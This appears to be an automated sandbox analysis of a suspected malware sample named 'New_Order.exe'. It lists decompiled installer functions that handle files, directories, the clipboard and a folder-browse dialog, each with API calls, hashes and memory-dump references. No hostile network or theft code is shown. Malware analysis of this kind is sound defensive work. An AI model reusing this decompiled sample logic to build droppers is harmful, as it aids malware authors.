                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                        • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                        • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                        • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405C6B, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405C6B(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                        0x00405c70
                                                                        0x00405c76
                                                                        0x00405c7b
                                                                        0x00405c84
                                                                        0x00405c84
                                                                        0x00405c8d

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                        • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                                        • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                        • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405761, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405761(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                        0x00405767
                                                                        0x0040576f
                                                                        0x00000000
                                                                        0x00405775
                                                                        0x00000000

                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateDirectoryErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1375471231-0
                                                                        • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                        • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                                        • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                        • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405D08, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405D08(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                        0x00405d0c
                                                                        0x00405d1c
                                                                        0x00405d24
                                                                        0x00000000
                                                                        0x00405d2b
                                                                        0x00000000
                                                                        0x00405d2d

                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                        • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                                        • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                        • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405D37, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405D37(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                        0x00405d3b
                                                                        0x00405d4b
                                                                        0x00405d53
                                                                        0x00000000
                                                                        0x00405d5a
                                                                        0x00000000
                                                                        0x00405d5c

                                                                        APIs
                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403300, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00403300(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                        0x0040330e
                                                                        0x00403314

                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                        • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                        • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                        • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405ABA, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405ABA(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                        0x00405aba
                                                                        0x00405acd
                                                                        0x00405acd
                                                                        0x00405ad1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405ac4
                                                                        0x00405ac7
                                                                        0x00000000
                                                                        0x00405ac7
                                                                        0x00000000
                                                                        0x00405ac4
                                                                        0x00405ad3

                                                                        APIs
                                                                        • CharNextA.USER32(?,00403455,"C:\Users\user\Desktop\New_Order.exe" ,00000020,"C:\Users\user\Desktop\New_Order.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00405AC7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CharNext
                                                                        • String ID:
                                                                        • API String ID: 3213498283-0
                                                                        • Opcode ID: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
                                                                        • Instruction ID: e7db52908d3e8830c535cfb70526cc2daabbcaa08dbe50b4a99c3e39ed970d4a
                                                                        • Opcode Fuzzy Hash: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
                                                                        • Instruction Fuzzy Hash: 00C08030208F8057CB10571091644677FF0FAD1700F7C496BF0C163150D13458408F36
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0040535C, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a890;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8);
							__eflags =  *0x42f4cc - _t150;
							if( *0x42f4cc == _t150) {
								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
							}
							E00404154(1);
							goto L25;
						}
						 *0x429c60 = 2;
						E00404154(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041E2(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E004041B0(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f434;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E004041B0( *0x42ebf0);
				 *0x42ebf4 = E00404AA1(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040417B(_a4);
				if(( *0x42f43c & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f43c & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004041B0( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f43c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                                        0x00405362
                                                                        0x0040536a
                                                                        0x0040536d
                                                                        0x00405375
                                                                        0x00405378
                                                                        0x00405507
                                                                        0x0040550d
                                                                        0x00405531
                                                                        0x00405531
                                                                        0x0040553d
                                                                        0x00405543
                                                                        0x00405565
                                                                        0x00405565
                                                                        0x0040556b
                                                                        0x004055c0
                                                                        0x004055c0
                                                                        0x004055c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004055c5
                                                                        0x004055c8
                                                                        0x004055cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004055d5
                                                                        0x004055db
                                                                        0x004055dd
                                                                        0x004055e0
                                                                        0x004056dd
                                                                        0x00000000
                                                                        0x004056dd
                                                                        0x004055ef
                                                                        0x004055fb
                                                                        0x00405604
                                                                        0x0040560b
                                                                        0x0040560f
                                                                        0x00405612
                                                                        0x0040561b
                                                                        0x00405621
                                                                        0x00405624
                                                                        0x00405624
                                                                        0x00405634
                                                                        0x0040563a
                                                                        0x0040563d
                                                                        0x00405648
                                                                        0x00405648
                                                                        0x00405649
                                                                        0x0040564c
                                                                        0x00405653
                                                                        0x0040565a
                                                                        0x00405662
                                                                        0x00405662
                                                                        0x00405670
                                                                        0x00405676
                                                                        0x00405679
                                                                        0x00405679
                                                                        0x00405680
                                                                        0x00405686
                                                                        0x0040568f
                                                                        0x00405696
                                                                        0x0040569f
                                                                        0x004056a1
                                                                        0x004056a4
                                                                        0x004056b3
                                                                        0x004056b5
                                                                        0x004056b8
                                                                        0x004056b9
                                                                        0x004056bc
                                                                        0x004056bd
                                                                        0x004056be
                                                                        0x004056be
                                                                        0x004056c6
                                                                        0x004056d1
                                                                        0x004056d7
                                                                        0x004056d7
                                                                        0x00000000
                                                                        0x0040563d
                                                                        0x0040556d
                                                                        0x00405573
                                                                        0x004055a1
                                                                        0x004055a3
                                                                        0x004055a9
                                                                        0x004055b4
                                                                        0x004055b4
                                                                        0x004055bb
                                                                        0x00000000
                                                                        0x004055bb
                                                                        0x00405577
                                                                        0x00405581
                                                                        0x00000000
                                                                        0x00405545
                                                                        0x00405545
                                                                        0x0040554b
                                                                        0x00405586
                                                                        0x00000000
                                                                        0x0040558d
                                                                        0x00405554
                                                                        0x0040555b
                                                                        0x00405560
                                                                        0x00000000
                                                                        0x00405560
                                                                        0x00405543
                                                                        0x0040537e
                                                                        0x00405382
                                                                        0x0040538a
                                                                        0x0040538e
                                                                        0x00405391
                                                                        0x00405394
                                                                        0x00405397
                                                                        0x0040539a
                                                                        0x0040539b
                                                                        0x0040539c
                                                                        0x004053b5
                                                                        0x004053b8
                                                                        0x004053c2
                                                                        0x004053d1
                                                                        0x004053d9
                                                                        0x004053e1
                                                                        0x004053e6
                                                                        0x004053e9
                                                                        0x004053f5
                                                                        0x004053fe
                                                                        0x00405407
                                                                        0x00405429
                                                                        0x0040542f
                                                                        0x00405440
                                                                        0x00405445
                                                                        0x00405453
                                                                        0x00405461
                                                                        0x00405461
                                                                        0x00405466
                                                                        0x00405474
                                                                        0x00405474
                                                                        0x00405479
                                                                        0x0040547c
                                                                        0x00405481
                                                                        0x0040548d
                                                                        0x00405496
                                                                        0x004054a3
                                                                        0x004054b2
                                                                        0x004054a5
                                                                        0x004054aa
                                                                        0x004054aa
                                                                        0x004054be
                                                                        0x004054be
                                                                        0x004054d2
                                                                        0x004054db
                                                                        0x004054e4
                                                                        0x004054f4
                                                                        0x00405500
                                                                        0x00405500
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                        • String ID:
                                                                        • API String ID: 590372296-0
                                                                        • Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                        • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                        • Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                        • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040460D, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a068;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057F7(0x3fb, _t146);
					E004063D2(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057F7(0x3fb, _t146);
							if(E00405B7D(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060F7(0x429860, _t146);
							_t87 = E00406500(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060F7(0x429860, _t146);
								_t89 = E00405B28(0x429860);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429860) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AD6(0x429860);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429860) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404AA1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x7c930d
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A89(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429850);
									} else {
										E004049C4(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040419D(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a880 == _t158) {
									E00404566();
								}
								 *0x42a880 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a890;
							_v60 = E0040495E;
							_v56 = _t146;
							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A8F(_t146);
								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a880 =  *0x42a880 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
